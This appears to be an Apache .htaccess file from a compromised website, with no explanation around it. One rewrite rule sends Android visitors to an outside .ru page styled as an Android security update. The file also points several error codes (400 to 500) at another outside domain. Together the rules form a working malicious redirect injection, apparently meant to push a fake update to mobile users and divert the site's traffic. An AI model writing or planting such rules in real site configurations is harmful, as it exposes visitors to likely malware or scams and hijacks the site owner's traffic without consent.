RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} .*ndroid.*
RewriteRule ^(.*)$ http://androidsecurityupdatepagelink.ru/fixup.php
ErrorDocument 400 http://youfxx.com
ErrorDocument 401 http://youfxx.com
ErrorDocument 403 http://youfxx.com
ErrorDocument 404 http://youfxx.com
ErrorDocument 500 http://youfxx.com